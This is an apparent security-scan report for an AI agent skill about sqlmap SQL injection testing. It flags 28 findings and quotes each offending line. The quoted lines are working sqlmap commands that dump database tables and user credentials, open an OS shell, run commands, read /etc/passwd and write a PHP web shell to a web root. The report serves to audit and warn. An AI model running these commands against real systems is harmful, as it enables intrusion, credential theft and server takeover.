Skip to main content

sqlmap-database-penetration-testing

Automates SQL injection testing and database penetration using SQLMap, enabling efficient vulnerability detection and data extraction.

Install this skill

or
50/100

Security score

The sqlmap-database-penetration-testing skill was audited on Feb 28, 2026 and we found 28 security issues across 2 threat categories, including 1 high-severity. Review the findings below before installing.

Categories Tested

Security Issues

high line 304

Access to /etc/passwd

SourceSKILL.md
304sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd" --batch
medium line 256

Access to root home directory

SourceSKILL.md
256sqlmap -r /root/Desktop/login.txt -p username --dbs --batch
medium line 393

Access to root home directory

SourceSKILL.md
393sqlmap -u "URL" --dbs --batch --output-dir=/root/sqlmap_session
low line 39

External URL reference

SourceSKILL.md
39http://target.com/page.php?id=1'
low line 48

External URL reference

SourceSKILL.md
48sqlmap -u "http://target.com/page.php?id=1" --batch
low line 51

External URL reference

SourceSKILL.md
51sqlmap -u "http://target.com/page.php?id=1" --batch -v 3
low line 58

External URL reference

SourceSKILL.md
58sqlmap -u "http://target.com/page.php?id=1" --dbs --batch
low line 70

External URL reference

SourceSKILL.md
70sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables --batch
low line 81

External URL reference

SourceSKILL.md
81sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns --batch
low line 92

External URL reference

SourceSKILL.md
92sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump --batch
low line 97

External URL reference

SourceSKILL.md
97sqlmap -u "http://target.com/page.php?id=1" -D database_name -T users -C username,password --dump --batch
low line 102

External URL reference

SourceSKILL.md
102sqlmap -u "http://target.com/page.php?id=1" -D database_name --dump-all --batch
low line 127

External URL reference

SourceSKILL.md
127# http://target1.com/page.php?id=1
low line 128

External URL reference

SourceSKILL.md
128# http://target2.com/page.php?id=2
low line 231

External URL reference

SourceSKILL.md
231sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch
low line 235

External URL reference

SourceSKILL.md
235sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --batch
low line 239

External URL reference

SourceSKILL.md
239sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch
low line 243

External URL reference

SourceSKILL.md
243sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch
low line 262

External URL reference

SourceSKILL.md
262echo "http://192.168.1.10/sqli/Less-1/?id=1" > bulkfile.txt
low line 263

External URL reference

SourceSKILL.md
263echo "http://192.168.1.10/sqli/Less-2/?id=1" >> bulkfile.txt
low line 272

External URL reference

SourceSKILL.md
272sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --level=5 --risk=3
low line 275

External URL reference

SourceSKILL.md
275sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --technique=BEUSTQ
low line 281

External URL reference

SourceSKILL.md
281sqlmap -u "http://target.com/page.php?id=1" \
low line 288

External URL reference

SourceSKILL.md
288sqlmap -u "http://target.com/page.php?id=1" \
low line 298

External URL reference

SourceSKILL.md
298sqlmap -u "http://target.com/page.php?id=1" --os-shell --batch
low line 301

External URL reference

SourceSKILL.md
301sqlmap -u "http://target.com/page.php?id=1" --os-cmd="whoami" --batch
low line 304

External URL reference

SourceSKILL.md
304sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd" --batch
low line 307

External URL reference

SourceSKILL.md
307sqlmap -u "http://target.com/page.php?id=1" --file-write="/local/shell.php" --file-dest="/var/www/html/shell.php" --batch
Scanned on Feb 28, 2026
View Security Dashboard
Installation guide →